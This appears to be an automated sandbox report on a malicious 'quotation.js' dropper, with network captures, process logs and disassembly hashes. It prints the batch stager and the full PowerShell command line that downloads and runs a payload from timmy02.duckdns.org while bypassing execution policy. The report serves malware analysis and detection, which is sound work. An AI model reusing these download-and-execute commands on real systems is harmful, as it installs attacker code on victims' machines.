                        Sep 2, 2024 07:47:41.445341110 CEST4970780192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:41.468447924 CEST4970780192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:41.472174883 CEST4972380192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:41.473309994 CEST804970741.105.186.133192.168.2.7
                        Sep 2, 2024 07:47:41.477040052 CEST804972341.105.186.133192.168.2.7
                        Sep 2, 2024 07:47:41.477111101 CEST4972380192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:41.477346897 CEST4972380192.168.2.741.105.186.133
                        Sep 2, 2024 07:47:41.482112885 CEST804972341.105.186.133192.168.2.7
                        Sep 2, 2024 07:48:02.844604969 CEST804972341.105.186.133192.168.2.7
                        Sep 2, 2024 07:48:02.844675064 CEST4972380192.168.2.741.105.186.133
                        Sep 2, 2024 07:48:02.845135927 CEST4972380192.168.2.741.105.186.133
                        Sep 2, 2024 07:48:02.849999905 CEST804972341.105.186.133192.168.2.7

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 2, 2024 07:47:15.732700109 CEST6383653192.168.2.71.1.1.1
                        Sep 2, 2024 07:47:15.740134954 CEST53638361.1.1.1192.168.2.7
                        Sep 2, 2024 07:47:19.409816027 CEST6115653192.168.2.71.1.1.1
                        Sep 2, 2024 07:47:20.025356054 CEST53611561.1.1.1192.168.2.7

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 2, 2024 07:47:15.732700109 CEST192.168.2.71.1.1.10x9b5aStandard query (0)rentry.coA (IP address)IN (0x0001)false
                        Sep 2, 2024 07:47:19.409816027 CEST192.168.2.71.1.1.10x48b6Standard query (0)timmy02.duckdns.orgA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 2, 2024 07:47:15.740134954 CEST1.1.1.1192.168.2.70x9b5aNo error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                        Sep 2, 2024 07:47:15.740134954 CEST1.1.1.1192.168.2.70x9b5aNo error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                        Sep 2, 2024 07:47:15.740134954 CEST1.1.1.1192.168.2.70x9b5aNo error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                        Sep 2, 2024 07:47:20.025356054 CEST1.1.1.1192.168.2.70x48b6No error (0)timmy02.duckdns.org41.105.186.133A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • rentry.co
                        • timmy02.duckdns.org

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.74970741.105.186.133805428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Sep 2, 2024 07:47:20.060497999 CEST196OUTGET /uploads/186024/Quotation.vbs.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: timmy02.duckdns.org
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.74972341.105.186.133805428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Sep 2, 2024 07:47:41.477346897 CEST196OUTGET /uploads/186024/Quotation.vbs.php HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                        Host: timmy02.duckdns.org
                        Connection: Keep-Alive


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.749702104.26.3.16443712C:\Windows\System32\wscript.exe
                        TimestampBytes transferredDirectionData
                        2024-09-02 05:47:16 UTC155OUTGET /6yg2yfkf/raw HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                        Host: rentry.co
                        2024-09-02 05:47:16 UTC697INHTTP/1.1 200 OK
                        Date: Mon, 02 Sep 2024 05:47:16 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 261
                        Connection: close
                        vary: Origin
                        x-xss-protection: 1; mode=block
                        x-content-type-options: nosniff
                        strict-transport-security: max-age=31536000; includeSubDomains
                        Cache-Control: Vary
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=709Z5dzYVzugJOVU%2B2uPK3ot0o8ZYa3bSAiexQnjPVnWifveFIAB%2BEvNCYDUTISohGY7opntwyDVjK69bLl5G01LmvdSfRiy6wBX0yuOOia2hnI%2FcDK5o2zBZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bcb34534efc8cd6-EWR
                        2024-09-02 05:47:16 UTC261INData Raw: 40 65 63 68 6f 20 6f 6e 0d 0a 53 45 54 4c 4f 43 41 4c 0d 0a 53 45 54 20 22 63 6d 64 55 52 4c 3d 44 6f 77 6e 6c 6f 61 64 55 52 4c 22 0d 0a 53 45 54 20 22 63 6d 64 50 61 74 68 3d 25 74 65 6d 70 25 5c 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 2e 74 6d 70 22 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 43 6f 6d 6d 61 6e 64 20 22 49 6e 76 6f 6b 65 2d 57 65 62 52 65 71 75 65 73 74 20 2d 55 72 69 20 27 25 63 6d 64 55 52 4c 25 27 20 2d 4f 75 74 46 69 6c 65 20 27 25 63 6d 64 50 61 74 68 25 27 20 22 0d 0a 63 6d 64 2e 65 78 65 20 2f 63 20 22 25 63 6d 64 50 61 74 68 25 22 0d 0a 74 61 73 6b 6b 69 6c 6c 20 2f 66 20 2f 69 6d 20 77 73 63 72 69 70 74 2e 65 78 65 0d 0a 45 4e 44 4c 4f 43 41 4c 0d 0a 44 45 4c 20
                        Data Ascii: @echo onSETLOCALSET "cmdURL=DownloadURL"SET "cmdPath=%temp%\DownloadFile.tmp"powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri '%cmdURL%' -OutFile '%cmdPath%' "cmd.exe /c "%cmdPath%"taskkill /f /im wscript.exeENDLOCALDEL


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:1
                        Start time:01:47:13
                        Start date:02/09/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js"
                        Imagebase:0x7ff7ac2a0000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:01:47:16
                        Start date:02/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "
                        Imagebase:0x7ff75da10000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:01:47:16
                        Start date:02/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:10
                        Start time:01:47:16
                        Start date:02/09/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
                        Imagebase:0x7ff741d30000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:18
                        Start time:02:59:07
                        Start date:02/09/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php"
                        Imagebase:0x7ff7fc7a0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:19
                        Start time:02:59:07
                        Start date:02/09/2024
                        Path:C:\Windows\System32\taskkill.exe
                        Wow64 process (32bit):false
                        Commandline:taskkill /f /im wscript.exe
                        Imagebase:0x7ff7e4760000
                        File size:101'376 bytes
                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 00007FFAAC222A25 Relevance: .4, Instructions: 433COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1787588939.00007FFAAC220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c61384e4d7c952ea1e1802a5bc321e3470039448e9d80db9f041014ee9278fad
                          • Instruction ID: cb3b836c4a34a4979dca9da0660c0d9c65dbfb5a232da9f2b74ea4560536ed07
                          • Opcode Fuzzy Hash: c61384e4d7c952ea1e1802a5bc321e3470039448e9d80db9f041014ee9278fad
                          • Instruction Fuzzy Hash: 99D1276190EB8A8FE766AB6888555B5BFE0EF16320F0841FED44DC72D3E919D80DC391
                          Function 00007FFAAC1533B5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                          • Instruction ID: 81efa9bd2774cbb50d7d2fca3ca2fbb11715c4afb94e494e09b718e93f0e5383
                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                          • Instruction Fuzzy Hash: 3801447111CB0C8FD748EF0CE451AA5B7E0FB95364F50056DE58AC3665DA26E882CB45

                          Non-executed Functions

                          Function 00007FFAAC154D9C Relevance: .1, Instructions: 109COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7875aac52959f1cb9ce4ee8a7154f3382810bda9fc716580b4657f3dcf07efd4
                          • Instruction ID: 8b23b94fe576e33b337d226a27739f2ca7424d181e7843912e06513a50a31655
                          • Opcode Fuzzy Hash: 7875aac52959f1cb9ce4ee8a7154f3382810bda9fc716580b4657f3dcf07efd4
                          • Instruction Fuzzy Hash: B6210561B4EE8E4FE7C6D72C8868665BBD0EF6621170481BAD04DC72A2DD2CDC498781
                          Function 00007FFAAC1502AD Relevance: 5.3, Strings: 4, Instructions: 264COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (0$8,$@J$p0
                          • API String ID: 0-1014356891
                          • Opcode ID: e6e75b96730afcf0bbac2ce4ccda084afe8964f5c55257b8dec46425f2f6914d
                          • Instruction ID: 2b419db1cbbf4a8ee335ccc555dc19df4453fc4954614b820afdcfb10bf12723
                          • Opcode Fuzzy Hash: e6e75b96730afcf0bbac2ce4ccda084afe8964f5c55257b8dec46425f2f6914d
                          • Instruction Fuzzy Hash: 87917F83A0FAC69FF35787E858561796E50AF63650B5C80FFD0CD8A1D7A849EE0D82C1
                          Function 00007FFAAC15044D Relevance: 5.1, Strings: 4, Instructions: 70COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1786850872.00007FFAAC150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC150000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_7ffaac150000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (0$8,$p0$/
                          • API String ID: 0-2790007160
                          • Opcode ID: 2f2680329b605be0022fb3490f03ef55b0a9096f387fd92d2b6139863ef2b91b
                          • Instruction ID: 85a78d50228aae1a68bc81b20b0f11b918cbfa4dbfa0eb9ccd25678772238afc
                          • Opcode Fuzzy Hash: 2f2680329b605be0022fb3490f03ef55b0a9096f387fd92d2b6139863ef2b91b
                          • Instruction Fuzzy Hash: 2B212C82A0F7C68FF32747E858660696E51AF23210B5980FFD0C88A5D79449DD4D83D2